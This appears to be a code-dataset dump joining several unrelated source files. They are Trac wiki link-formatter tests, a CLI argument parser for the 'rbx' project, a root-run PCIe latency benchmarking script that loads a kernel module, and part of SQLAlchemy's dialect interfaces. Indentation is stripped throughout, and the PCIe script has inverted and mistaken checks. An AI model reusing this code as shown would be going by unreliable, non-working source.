And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage?</a>
</p>
------------------------------
============================== Splitting internal free links
["WikiPage"]
["./WikiPage"]
["../WikiPage"]
["./.././WikiPage"]
["WikiPage?param=1#fragment"]
["./WikiPage?param=1#fragment"]
["../WikiPage?param=1#fragment"]
But not ["./wiki_page"]
And not ["../WikiPage" WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page?</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage?</a>
</p>
------------------------------
""" # "
SCOPED_LINKS_TESTS = u"""
============================== Scoped links for hierarchical pages
ThirdLevel
[wiki:ThirdLevel]
OtherThirdLevel
[wiki:OtherThirdLevel]
SecondLevel/OtherThirdLevel
[wiki:SecondLevel/OtherThirdLevel]
SecondLevel
[wiki:SecondLevel]
FirstLevel
[wiki:FirstLevel]
TestPage
[wiki:TestPage]
MissingPage
[wiki:MissingPage]
FirstLevel/MissingPage
[wiki:FirstLevel/MissingPage]
SecondLevel/MissingPage
[wiki:SecondLevel/MissingPage]
MissingFirstLevel/MissingPage
[wiki:MissingFirstLevel/MissingPage]
["/OtherThirdLevel"]
[wiki:/OtherThirdLevel]
[wiki:/OtherThirdLevel /OtherThirdLevel]
------------------------------
<p>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage?</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel?</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel?</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">/OtherThirdLevel?</a>
</p>
------------------------------
""" # "
def wiki_setup(tc):
tc.env.config.set('wiki', 'render_unsafe_content', True) # for #9712
now = datetime.now(utc)
wiki0 = WikiPage(tc.env)
wiki0.name = 'Main/Sub'
wiki0.text = '--'
wiki0.save('joe', 'subpage', '::1', now)
wiki1 = WikiPage(tc.env)
wiki1.name = 'TestPage'
wiki1.text = '--'
wiki1.save('joe', 'normal WikiPageNames', '::1', now)
wiki2 = WikiPage(tc.env)
wiki2.name = 'Space 1 23'
wiki2.text = '--'
wiki2.save('joe', 'not a WikiPageNames', '::1', now)
wiki3 = WikiPage(tc.env)
wiki3.name = u"C'est l'\xe9t\xe9"
wiki3.text = '--'
wiki3.save('joe', 'unicode WikiPageNames', '::1', now)
imt = WikiPage(tc.env)
imt.name = u"InterMapTxt"
imt.text = """
This is the InterMapTxt
----
{{{
MeatBall http://www.usemod.com/cgi-bin/mb.pl? # $1 in MeatBall...
tsvn tsvn:
complex http://server/$1/page/$2?format=txt # resource $2 in $1
over http://unused/? # Overridden in trac.ini
}}}
----
{{{
nolink http://noweb
}}}
"""
imt.save('joe', 'test InterWiki links', '::1', now)
tc.env.config.set('interwiki', 'inter',
'http://inter/$1/page/$2 Resource $2 in $1')
tc.env.config.set('interwiki', 'over',
'http://over/$1/page/$2')
w = WikiPage(tc.env)
w.name = 'FirstLevel'
w.text = '--'
w.save('joe', 'first level of hierarchy', '::1', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel'
w.text = '--'
w.save('joe', 'second level of hierarchy', '::1', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/ThirdLevel'
w.text = '--'
w.save('joe', 'third level of hierarchy', '::1', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/OtherThirdLevel'
w.text = '--'
w.save('joe', 'other third level of hierarchy', '::1', now)
def wiki_teardown(tc):
tc.env.reset_db()
def wiki_setup_split(tc):
tc.env.config.set('wiki', 'split_page_names', 'true')
wiki_setup(tc)
def suite():
suite = unittest.TestSuite()
suite.addTest(formatter.suite(TEST_CASES, wiki_setup, __file__,
wiki_teardown))
suite.addTest(formatter.suite(RELATIVE_LINKS_TESTS, wiki_setup, __file__,
wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.suite(SPLIT_PAGE_NAMES_TESTS, wiki_setup_split,
__file__, wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.suite(SCOPED_LINKS_TESTS, wiki_setup, __file__,
wiki_teardown,
context=('wiki',
'FirstLevel/SecondLevel/ThirdLevel')))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
bsd-3-clause
| 8,973,763,177,520,281,000 | 43.363032 | 346 | 0.642247 | false |
jexhson/rbx
|
rbx/parser/component.py
|
1
|
4537
|
from .base import RbxBaseParser
class RbxComponentParser(RbxBaseParser):
def build_parser(self):
parser = self.subparsers.add_parser('component',
help='Manage Run in the Box components')
parser.add_argument('name',
help='Component\'s name to work on')
self.component_subparsers = parser.add_subparsers(dest='action')
self.create_component_parser()
self.configure_component_parser()
self.set_component_description_parser()
self.manage_component_rights_parser()
self.change_component_visibility_parser()
self.component_details_parser()
def create_component_parser(self):
parser = self.component_subparsers.add_parser('create',
help='Create a new component')
parser.add_argument('kind',
help='Component kind')
parser.add_argument('image',
help='Docker image name on index.docker.io')
def configure_component_parser(self):
parser = self.component_subparsers.add_parser('set',
help='Configure component')
self.component_config_subparser = parser.add_subparsers(
dest='configurator')
self.configure_component_port_parser()
self.configure_component_volume_parser()
self.configure_component_command_parser()
self.configure_component_image_parser()
def configure_component_port_parser(self):
parser = self.component_config_subparser.add_parser('port',
help='Configure component\'s port')
parser.add_argument('number',
help='Container port number',
type=int)
parser.add_argument('-d', '--description',
help='Port usage description')
parser.add_argument('-r', '--remove',
help='Remove port',
default=False,
action='store_true')
def configure_component_volume_parser(self):
parser = self.component_config_subparser.add_parser('volume',
help='Configure component\'s volume')
parser.add_argument('path',
help='Container volume path')
parser.add_argument('-d', '--description',
help='Port usage description')
parser.add_argument('-r', '--remove',
help='Remove volume',
default=False,
action='store_true')
def configure_component_image_parser(self):
parser = self.component_config_subparser.add_parser('image',
help='Configure component\'s image')
parser.add_argument('image',
help='Container image')
def configure_component_command_parser(self):
parser = self.component_config_subparser.add_parser('command',
help='Container command to run on startup')
parser.add_argument('command',
help='Container command')
def set_component_description_parser(self):
parser = self.component_subparsers.add_parser('describe',
help='Set component description')
parser.add_argument('description',
help='Component description')
def manage_component_rights_parser(self):
self.grant_component_rights_parser()
self.revoke_component_rights_parser()
def grant_component_rights_parser(self):
parser = self.component_subparsers.add_parser('grant',
help='Grant component\'s rights on users')
parser.add_argument('rights',
help='Granted rights type',
choices=['viewer', 'contributor', 'administrator'])
parser.add_argument('user',
help='User to grant rights on',
nargs='+')
def revoke_component_rights_parser(self):
parser = self.component_subparsers.add_parser('revoke',
help='Revoke users from a component regardless of it rights')
parser.add_argument('user',
help='User to be revoked',
nargs='+')
def change_component_visibility_parser(self):
parser = self.component_subparsers.add_parser('mark',
help='Change component visibility')
parser.add_argument('visibility',
help='New component visibility',
choices=['public', 'private'])
def component_details_parser(self):
parser = self.component_subparsers.add_parser('details',
help='Display component informations and configuration')
parser.add_argument('-i', '--inspect',
help='Show raw component configuration',
action='store_true')
|
gpl-2.0
| 4,179,731,277,519,826,000 | 38.452174 | 73 | 0.623099 | false |
andre-richter/pcie-lat
|
all_in_one.py
|
1
|
6054
|
#!/usr/bin/python
import sys
import os
import numpy as np
import matplotlib
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import subprocess
import traceback
pci_dev ={
"name" : "",
"loc" : "",
"class" : "",
"vender" : "",
"device" : "",
"vd" : "",
"isBridge" : 1,
"driver" : ""
}
def is_root():
return os.geteuid() == 0
def get_pci_list():
out = subprocess.Popen(['lspci', '-nm'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = out.communicate()
lspci_str = stdout.decode('ascii')
pci_list = []
pcis = lspci_str.split('\n')
for each_pci in pcis:
pci = {}
__ = each_pci.split(" ")
if len(__) < 4:
continue
pci["loc"] = __[0].replace('"', '')
pci["vender"] = __[2].replace('"', '')
pci["device"] = __[3].replace('"', '')
pci["vd"] = ":".join([pci["vender"], pci["device"]])
out = subprocess.Popen(['lspci', '-s', '{}'.format(pci["loc"]), "-mvk"],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = out.communicate()
ss = stdout.decode('ascii')
for line in ss.split("\n"):
if ': ' in line:
k, v = line.split(": ")
if k.strip() == "Class":
pci['class'] = v.strip().replace('"', '')
elif k.strip() == "Vendor":
pci['vender'] = v.strip().replace('"', '')
elif k.strip() == "Device" and ss.split("\n").index(line) > 0:
pci['device'] = v.strip().replace('"', '')
elif k.strip() == "Driver":
pci['driver'] = v.strip().replace('"', '')
else:
pass
else:
continue
pci_list.append(pci)
return pci_list
def print_mach_info(tsc_freq, tsc_overhead, loops):
print("-------------------------------")
print(" tsc_freq : {}".format(tsc_freq))
print(" tsc_overhead : {} clocks".format(tsc_overhead))
print(" loops : {}".format(loops))
print("-------------------------------")
def clock2ns(clocks, tsc_freq):
return int(clocks*1000000000/tsc_freq)
def plot_y(y, fname):
num_width = 10
ymin = int(min(y))-1
ymax = int(max(y))+1
print("Max. and Min. latencies are {}ns {}ns".format(ymax, ymin))
margin = max(num_width, 5)
bins = [ii for ii in range(ymin-margin, ymax+margin, num_width)]
plt.yscale('log')
n, bins, patches = plt.hist(y, bins, range=(min(y), max(y)), width=10, color='blue')
plt.xlabel('nanoseconds')
plt.ylabel('Probability')
plt.title('Histogram of PCIe latencies (%s samples)' % len(y))
plt.savefig(fname, dpi=200, format='png')
def main():
loops = 0
if len(sys.argv) < 2:
print("Usage: {} [0000]:XX:XX.X [loops]".format(sys.argv[0]))
exit(-1)
else:
pci_test = sys.argv[1]
if pci_test.startswith('0000:'):
pci_test = sys.argv[0][5:]
if len(sys.argv) == 3:
loops = int(sys.argv[2])
else:
loops = 100000
### must be root to run the script
if not is_root():
print("Need root privillege! run as root!")
exit(-1)
### get all devices in this computer
pcis = get_pci_list()
if pci_test not in [pp['loc'] for pp in pcis]:
print("existing PCI devices:")
for __ in pcis:
print(__)
print("{} not found!".format(pci_test))
exit(-1)
for p in pcis:
if p['loc'] == pci_test:
pci_test = p
unbind_file = "/sys/bus/pci/devices/0000\:{}/driver/unbind"
unbind_file = unbind_file.format(pci_test['loc'].replace(':', '\:'))
if os.path.exists(unbind_file):
print("Unbind file {} not found!".format(unbind_file))
exit(-1)
unbind_ss = 'echo -n "0000:{}" > {}'.format(pci_test['loc'], unbind_file)
os.system(unbind_ss)
# insert module
os.system("make")
print("finished compiling the pcie-lat, insmod...");
ins_command = "sudo insmod ./pcie-lat.ko ids={}".format(pci_test['vd'])
print(ins_command)
os.system(ins_command)
# couting
try:
sys_path_head = "/sys/bus/pci/devices/0000:{}/pcie-lat/{}/pcielat_"
sys_path_head = sys_path_head.format(pci_test['loc'], pci_test['loc'])
tsc_freq = 0
tsc_overhead = 0
with open(sys_path_head+'tsc_freq', 'r') as __:
tsc_freq = int(float(__.read()))
with open(sys_path_head+'tsc_overhead', 'r') as __:
tsc_overhead = int(float(__.read()))
with open(sys_path_head+'loops', 'w') as __:
__.write(str(loops))
with open(sys_path_head+'target_bar', 'w') as __:
__.write('0')
print_mach_info(tsc_freq, tsc_overhead, loops)
with open(sys_path_head+'measure', 'w') as __:
__.write('0')
with open('/dev/pcie-lat/{}'.format(pci_test['loc']), 'rb') as __:
y = []
cc = __.read(16)
while cc:
acc = 0
acc2 = 0
for ii in range(8):
acc = acc*256 + int(cc[7-ii])
acc2 = acc2*256 + int(cc[15-ii])
y.append(clock2ns(acc2, tsc_freq))
# read next
cc = __.read(16)
fname = "pcie_lat_loops{}_{}.png"
fname = fname.format(loops, pci_test['loc'].replace(':', '..'))
print("plot the graph")
plot_y(y, fname)
except Exception:
traceback.print_exc()
print("Removing module : sudo rmmod pcie-lat.ko")
os.system("sudo rmmod pcie-lat.ko")
exit(-1)
# remove module
print("Removing module : sudo rmmod pcie-lat.ko")
os.system("sudo rmmod pcie-lat.ko")
if __name__ == "__main__":
main()
|
gpl-2.0
| -6,173,611,715,893,738,000 | 31.202128 | 88 | 0.49042 | false |
michaelBenin/sqlalchemy
|
lib/sqlalchemy/engine/interfaces.py
|
1
|
30297
|
# engine/interfaces.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define core interfaces used by the engine system."""
from .. import util, event
# backwards compat
from ..sql.compiler import Compiled, TypeCompiler
class Dialect(object):
"""Define the behavior of a specific database and DB-API combination.
Any aspect of metadata definition, SQL query generation,
execution, result-set handling, or anything else which varies
between databases is defined under the general category of the
Dialect. The Dialect acts as a factory for other
database-specific object implementations including
ExecutionContext, Compiled, DefaultGenerator, and TypeEngine.
All Dialects implement the following attributes:
name
identifying name for the dialect from a DBAPI-neutral point of view
(i.e. 'sqlite')
driver
identifying name for the dialect's DBAPI
positional
True if the paramstyle for this Dialect is positional.
paramstyle
the paramstyle to be used (some DB-APIs support multiple
paramstyles).
convert_unicode
True if Unicode conversion should be applied to all ``str``
types.
encoding
type of encoding to use for unicode, usually defaults to
'utf-8'.
statement_compiler
a :class:`.Compiled` class used to compile SQL statements
ddl_compiler
a :class:`.Compiled` class used to compile DDL statements
server_version_info
a tuple containing a version number for the DB backend in use.
This value is only available for supporting dialects, and is
typically populated during the initial connection to the database.
default_schema_name
the name of the default schema. This value is only available for
supporting dialects, and is typically populated during the
initial connection to the database.
execution_ctx_cls
a :class:`.ExecutionContext` class used to handle statement execution
execute_sequence_format
either the 'tuple' or 'list' type, depending on what cursor.execute()
accepts for the second argument (they vary).
preparer
a :class:`~sqlalchemy.sql.compiler.IdentifierPreparer` class used to
quote identifiers.
supports_alter
``True`` if the database supports ``ALTER TABLE``.
max_identifier_length
The maximum length of identifier names.
supports_unicode_statements
Indicate whether the DB-API can receive SQL statements as Python
unicode strings
supports_unicode_binds
Indicate whether the DB-API can receive string bind parameters
as Python unicode strings
supports_sane_rowcount
Indicate whether the dialect properly implements rowcount for
``UPDATE`` and ``DELETE`` statements.
supports_sane_multi_rowcount
Indicate whether the dialect properly implements rowcount for
``UPDATE`` and ``DELETE`` statements when executed via
executemany.
preexecute_autoincrement_sequences
True if 'implicit' primary key functions must be executed separately
in order to get their value. This is currently oriented towards
Postgresql.
implicit_returning
use RETURNING or equivalent during INSERT execution in order to load
newly generated primary keys and other column defaults in one execution,
which are then available via inserted_primary_key.
If an insert statement has returning() specified explicitly,
the "implicit" functionality is not used and inserted_primary_key
will not be available.
dbapi_type_map
A mapping of DB-API type objects present in this Dialect's
DB-API implementation mapped to TypeEngine implementations used
by the dialect.
This is used to apply types to result sets based on the DB-API
types present in cursor.description; it only takes effect for
result sets against textual statements where no explicit
typemap was present.
colspecs
A dictionary of TypeEngine classes from sqlalchemy.types mapped
to subclasses that are specific to the dialect class. This
dictionary is class-level only and is not accessed from the
dialect instance itself.
supports_default_values
Indicates if the construct ``INSERT INTO tablename DEFAULT
VALUES`` is supported
supports_sequences
Indicates if the dialect supports CREATE SEQUENCE or similar.
sequences_optional
If True, indicates if the "optional" flag on the Sequence() construct
should signal to not generate a CREATE SEQUENCE. Applies only to
dialects that support sequences. Currently used only to allow Postgresql
SERIAL to be used on a column that specifies Sequence() for usage on
other backends.
supports_native_enum
Indicates if the dialect supports a native ENUM construct.
This will prevent types.Enum from generating a CHECK
constraint when that type is used.
supports_native_boolean
Indicates if the dialect supports a native boolean construct.
This will prevent types.Boolean from generating a CHECK
constraint when that type is used.
"""
_has_events = False
def create_connect_args(self, url):
"""Build DB-API compatible connection arguments.
Given a :class:`~sqlalchemy.engine.url.URL` object, returns a tuple
consisting of a `*args`/`**kwargs` suitable to send directly
to the dbapi's connect function.
"""
raise NotImplementedError()
@classmethod
def type_descriptor(cls, typeobj):
"""Transform a generic type to a dialect-specific type.
Dialect classes will usually use the
:func:`.types.adapt_type` function in the types module to
accomplish this.
The returned result is cached *per dialect class* so can
contain no dialect-instance state.
"""
raise NotImplementedError()
def initialize(self, connection):
"""Called during strategized creation of the dialect with a
connection.
Allows dialects to configure options based on server version info or
other properties.
The connection passed here is a SQLAlchemy Connection object,
with full capabilities.
The initialize() method of the base dialect should be called via
super().
"""
pass
def reflecttable(self, connection, table, include_columns, exclude_columns):
"""Load table description from the database.
Given a :class:`.Connection` and a
:class:`~sqlalchemy.schema.Table` object, reflect its columns and
properties from the database.
The implementation of this method is provided by
:meth:`.DefaultDialect.reflecttable`, which makes use of
:class:`.Inspector` to retrieve column information.
Dialects should **not** seek to implement this method, and should
instead implement individual schema inspection operations such as
:meth:`.Dialect.get_columns`, :meth:`.Dialect.get_pk_constraint`,
etc.
"""
raise NotImplementedError()
def get_columns(self, connection, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return column
information as a list of dictionaries with these keys:
name
the column's name
type
[sqlalchemy.types#TypeEngine]
nullable
boolean
default
the column's default value
autoincrement
boolean
sequence
a dictionary of the form
{'name' : str, 'start' :int, 'increment': int}
Additional column attributes may be present.
"""
raise NotImplementedError()
def get_primary_keys(self, connection, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Deprecated. This method is only called by the default
implementation of :meth:`.Dialect.get_pk_constraint`. Dialects should
instead implement the :meth:`.Dialect.get_pk_constraint` method directly.
"""
raise NotImplementedError()
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
"""Return information about the primary key constraint on
table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return primary
key information as a dictionary with these keys:
constrained_columns
a list of column names that make up the primary key
name
optional name of the primary key constraint.
"""
raise NotImplementedError()
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return foreign
key information as a list of dicts with these keys:
name
the constraint's name
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
"""
raise NotImplementedError()
def get_table_names(self, connection, schema=None, **kw):
"""Return a list of table names for `schema`."""
raise NotImplementedError
def get_view_names(self, connection, schema=None, **kw):
"""Return a list of all view names available in the database.
schema:
Optional, retrieve names from a non-default schema.
"""
raise NotImplementedError()
def get_view_definition(self, connection, view_name, schema=None, **kw):
"""Return view definition.
Given a :class:`.Connection`, a string
`view_name`, and an optional string `schema`, return the view
definition.
"""
raise NotImplementedError()
def get_indexes(self, connection, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a :class:`.Connection`, a string
`table_name` and an optional string `schema`, return index
information as a list of dictionaries with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
"""
raise NotImplementedError()
def get_unique_constraints(self, connection, table_name, schema=None, **kw):
"""Return information about unique constraints in `table_name`.
Given a string `table_name` and an optional string `schema`, return
unique constraint information as a list of dicts with these keys:
name
the unique constraint's name
column_names
list of column names in order
\**kw
other options passed to the dialect's get_unique_constraints() method.
.. versionadded:: 0.9.0
"""
raise NotImplementedError()
def normalize_name(self, name):
"""convert the given name to lowercase if it is detected as
case insensitive.
this method is only used if the dialect defines
requires_name_normalize=True.
"""
raise NotImplementedError()
def denormalize_name(self, name):
"""convert the given name to a case insensitive identifier
for the backend if it is an all-lowercase name.
this method is only used if the dialect defines
requires_name_normalize=True.
"""
raise NotImplementedError()
def has_table(self, connection, table_name, schema=None):
"""Check the existence of a particular table in the database.
Given a :class:`.Connection` object and a string
`table_name`, return True if the given table (possibly within
the specified `schema`) exists in the database, False
otherwise.
"""
raise NotImplementedError()
def has_sequence(self, connection, sequence_name, schema=None):
"""Check the existence of a particular sequence in the database.
Given a :class:`.Connection` object and a string
`sequence_name`, return True if the given sequence exists in
the database, False otherwise.
"""
raise NotImplementedError()
def _get_server_version_info(self, connection):
"""Retrieve the server version info from the given connection.
This is used by the default implementation to populate the
"server_version_info" attribute and is called exactly
once upon first connect.
"""
raise NotImplementedError()
def _get_default_schema_name(self, connection):
"""Return the string name of the currently selected schema from
the given connection.
This is used by the default implementation to populate the
"default_schema_name" attribute and is called exactly
once upon first connect.
"""
raise NotImplementedError()
def do_begin(self, dbapi_connection):
"""Provide an implementation of ``connection.begin()``, given a
DB-API connection.
The DBAPI has no dedicated "begin" method and it is expected
that transactions are implicit. This hook is provided for those
DBAPIs that might need additional help in this area.
Note that :meth:`.Dialect.do_begin` is not called unless a
:class:`.Transaction` object is in use. The
:meth:`.Dialect.do_autocommit`
hook is provided for DBAPIs that need some extra commands emitted
after a commit in order to enter the next transaction, when the
SQLAlchemy :class:`.Connection` is used in its default "autocommit"
mode.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_rollback(self, dbapi_connection):
"""Provide an implementation of ``connection.rollback()``, given
a DB-API connection.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_commit(self, dbapi_connection):
"""Provide an implementation of ``connection.commit()``, given a
DB-API connection.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_close(self, dbapi_connection):
"""Provide an implementation of ``connection.close()``, given a DBAPI
connection.
This hook is called by the :class:`.Pool` when a connection has been
detached from the pool, or is being returned beyond the normal
capacity of the pool.
.. versionadded:: 0.8
"""
raise NotImplementedError()
def create_xid(self):
"""Create a two-phase transaction ID.
This id will be passed to do_begin_twophase(),
do_rollback_twophase(), do_commit_twophase(). Its format is
unspecified.
"""
raise NotImplementedError()
def do_savepoint(self, connection, name):
"""Create a savepoint with the given name.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_rollback_to_savepoint(self, connection, name):
"""Rollback a connection to the named savepoint.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_release_savepoint(self, connection, name):
"""Release the named savepoint on a connection.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_begin_twophase(self, connection, xid):
"""Begin a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
"""
raise NotImplementedError()
def do_prepare_twophase(self, connection, xid):
"""Prepare a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
"""
raise NotImplementedError()
def do_rollback_twophase(self, connection, xid, is_prepared=True,
recover=False):
"""Rollback a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
:param is_prepared: whether or not
:meth:`.TwoPhaseTransaction.prepare` was called.
:param recover: if the recover flag was passed.
"""
raise NotImplementedError()
def do_commit_twophase(self, connection, xid, is_prepared=True,
recover=False):
"""Commit a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
:param is_prepared: whether or not
:meth:`.TwoPhaseTransaction.prepare` was called.
:param recover: if the recover flag was passed.
"""
raise NotImplementedError()
def do_recover_twophase(self, connection):
"""Recover list of uncommited prepared two phase transaction
identifiers on the given connection.
:param connection: a :class:`.Connection`.
"""
raise NotImplementedError()
def do_executemany(self, cursor, statement, parameters, context=None):
"""Provide an implementation of ``cursor.executemany(statement,
parameters)``."""
raise NotImplementedError()
def do_execute(self, cursor, statement, parameters, context=None):
"""Provide an implementation of ``cursor.execute(statement,
parameters)``."""
raise NotImplementedError()
def do_execute_no_params(self, cursor, statement, parameters,
context=None):
"""Provide an implementation of ``cursor.execute(statement)``.
The parameter collection should not be sent.
"""
raise NotImplementedError()
def is_disconnect(self, e, connection, cursor):
"""Return True if the given DB-API error indicates an invalid
connection"""
raise NotImplementedError()
def connect(self):
"""return a callable which sets up a newly created DBAPI connection.
The callable accepts a single argument "conn" which is the
DBAPI connection itself. It has no return value.
This is used to set dialect-wide per-connection options such as
isolation modes, unicode modes, etc.
If a callable is returned, it will be assembled into a pool listener
that receives the direct DBAPI connection, with all wrappers removed.
If None is returned, no listener will be generated.
"""
return None
def reset_isolation_level(self, dbapi_conn):
"""Given a DBAPI connection, revert its isolation to the default."""
raise NotImplementedError()
def set_isolation_level(self, dbapi_conn, level):
"""Given a DBAPI connection, set its isolation level."""
raise NotImplementedError()
def get_isolation_level(self, dbapi_conn):
"""Given a DBAPI connection, return its isolation level."""
raise NotImplementedError()
class ExecutionContext(object):
"""A messenger object for a Dialect that corresponds to a single
execution.
ExecutionContext should have these data members:
connection
Connection object which can be freely used by default value
generators to execute SQL. This Connection should reference the
same underlying connection/transactional resources of
root_connection.
root_connection
Connection object which is the source of this ExecutionContext. This
Connection may have close_with_result=True set, in which case it can
only be used once.
dialect
dialect which created this ExecutionContext.
cursor
DB-API cursor procured from the connection,
compiled
if passed to constructor, sqlalchemy.engine.base.Compiled object
being executed,
statement
string version of the statement to be executed. Is either
passed to the constructor, or must be created from the
sql.Compiled object by the time pre_exec() has completed.
parameters
bind parameters passed to the execute() method. For compiled
statements, this is a dictionary or list of dictionaries. For
textual statements, it should be in a format suitable for the
dialect's paramstyle (i.e. dict or list of dicts for non
positional, list or list of lists/tuples for positional).
isinsert
True if the statement is an INSERT.
isupdate
True if the statement is an UPDATE.
should_autocommit
True if the statement is a "committable" statement.
prefetch_cols
a list of Column objects for which a client-side default
was fired off. Applies to inserts and updates.
postfetch_cols
a list of Column objects for which a server-side default or
inline SQL expression value was fired off. Applies to inserts
and updates.
"""
exception = None
"""A DBAPI-level exception that was caught when this ExecutionContext
attempted to execute a statement.
This attribute is meaningful only within the
:meth:`.ConnectionEvents.dbapi_error` event.
.. versionadded:: 0.9.7
.. seealso::
:attr:`.ExecutionContext.is_disconnect`
:meth:`.ConnectionEvents.dbapi_error`
"""
is_disconnect = None
"""Boolean flag set to True or False when a DBAPI-level exception
is caught when this ExecutionContext attempted to execute a statement.
This attribute is meaningful only within the
:meth:`.ConnectionEvents.dbapi_error` event.
.. versionadded:: 0.9.7
.. seealso::
:attr:`.ExecutionContext.exception`
:meth:`.ConnectionEvents.dbapi_error`
"""
def create_cursor(self):
"""Return a new cursor generated from this ExecutionContext's
connection.
Some dialects may wish to change the behavior of
connection.cursor(), such as postgresql which may return a PG
"server side" cursor.
"""
raise NotImplementedError()
def pre_exec(self):
"""Called before an execution of a compiled statement.
If a compiled statement was passed to this ExecutionContext,
the `statement` and `parameters` datamembers must be
initialized after this statement is complete.
"""
raise NotImplementedError()
def post_exec(self):
"""Called after the execution of a compiled statement.
If a compiled statement was passed to this ExecutionContext,
the `last_insert_ids`, `last_inserted_params`, etc.
datamembers should be available after this method completes.
"""
raise NotImplementedError()
def result(self):
"""Return a result object corresponding to this ExecutionContext.
Returns a ResultProxy.
"""
raise NotImplementedError()
def handle_dbapi_exception(self, e):
"""Receive a DBAPI exception which occurred upon execute, result
fetch, etc."""
raise NotImplementedError()
def should_autocommit_text(self, statement):
"""Parse the given textual statement and return True if it refers to
a "committable" statement"""
raise NotImplementedError()
def lastrow_has_defaults(self):
"""Return True if the last INSERT or UPDATE row contained
inlined or database-side defaults.
"""
raise NotImplementedError()
def get_rowcount(self):
